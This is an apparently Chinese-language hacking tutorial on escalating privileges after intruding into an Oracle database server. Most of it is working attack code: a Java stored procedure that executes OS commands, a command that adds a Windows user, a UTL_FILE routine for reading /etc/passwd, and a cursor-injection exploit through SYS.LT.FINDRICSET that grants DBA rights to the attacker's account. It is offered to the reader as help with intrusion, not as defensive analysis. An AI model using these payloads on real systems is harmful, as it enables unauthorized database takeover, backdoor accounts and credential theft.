再進行入侵Oracle服務器的進一步來獲取權限時,我們需要快速的連接上Oracle服務器,此時你會發現,的情況有,連接之後不是dba權限,或不能利用SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES漏洞提升權限。
3.運行SELECT UTL_HTTP.request(‘http://xxxxxxxxxxx/login.JSP’) FROM dual 後發現Oracle服務器不能連接網絡。
幸運的是,
運行
- create or replace function Linx_Query (p varchar2)
return number authid current_user is begin execute
immediate p; return 1;end;
成功!這個用戶具有create proceduce權限。
此時馬上想到創建Java擴展執行命令:
- create or replace and compile Java source named
“LinxUtil” as import Java.io.*; public class LinxUtil extends Object
{public static String runCMD(String args) {try{BufferedReader myReader=
new BufferedReader
(new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) );
String stemp,str=”";while ((stemp = myReader.readLine()) != null) str +=stemp+”
“;myReader.close();return str;} catch (Exception e){return e.toString();}}}- begin dbms_Java.grant_permission
(‘PUBLIC’, ‘SYS:Java.io.FilePermission’, ‘<>’, ‘execute’ );end;- create or replace function LinxRunCMD(p_cmd in varchar2)
return varchar2 as language Java name
‘LinxUtil.runCMD(Java.lang.String) return String’- select * from all_objects where object_name like ‘%LINX%’
- grant all on LinxRunCMD to public
- select LinxRunCMD(‘cmd /c net user linx /add’) from dual
但是在第一步就卡住了,服務器由於某種未知原因 不能創建Java擴展!!
還好,我們還有UTL庫可以利用:
- create or replace function LinxUTLReadfile
(filename varchar2) return varchar2 is- fHandler UTL_FILE.FILE_TYPE;
- buf varchar2(4000);
- output varchar2(8000);
- BEGIN
- fHandler := UTL_FILE.FOPEN(‘UTL_FILE_DIR’, filename, ‘r’);
- loop
- begin
- utl_file.get_line(fHandler,buf);
- DBMS_OUTPUT.PUT_LINE(‘Cursor: ‘||buf);
- exception
- when no_data_found then exit;
- end;
- output := output||buf||chr(10);
- end loop;
- UTL_FILE.FCLOSE(fHandler);
- return output;
- END;
UTL_FILE_DIR需要先用:
- CREATE OR REPLACE DIRECTORY UTL_FILE_DIR AS ‘/etc’;
指定目。但運行後發現沒有權限。只好想辦法提權。
游標注射
老外寫了N個pdf介紹這技術,我精簡了代碼:
- DECLARE
- MYC NUMBER;
- BEGIN
- MYC := DBMS_SQL.OPEN_CURSOR;
- DBMS_SQL.PARSE(MYC,’declare pragma autonomous_transaction;
begin execute immediate
”GRANT DBA TO linxlinx_current_db_user”;commit;end;’,0);- DBMS_OUTPUT.PUT_LINE(‘Cursor: ‘||MYC);
- BEGIN SYS.LT.FINDRICSET
(‘.”||dbms_sql.execute( ‘||MYC||’ )||””)–’,'x’); END;- raise NO_DATA_FOUND;
- EXCEPTION
- WHEN NO_DATA_FOUND THEN DBMS_OUTPUT.PUT_LINE(‘Cursor: ‘||MYC);
- WHEN OTHERS THEN DBMS_OUTPUT.PUT_LINE(‘Cursor: ‘||MYC);
- END;
運行後重新連接就有dba權限了,簡單吧……
現在可以讀取文件了:
- CREATE OR REPLACE DIRECTORY UTL_FILE_DIR AS ‘/etc’;
- select LinxUTLReadfile(‘passwd’) from dual
後面就簡單了,不寫了。上述的相關內容就是對入侵Oracle服務器進一步獲取權限的描述,希望會給你帶來一些幫助在此方面。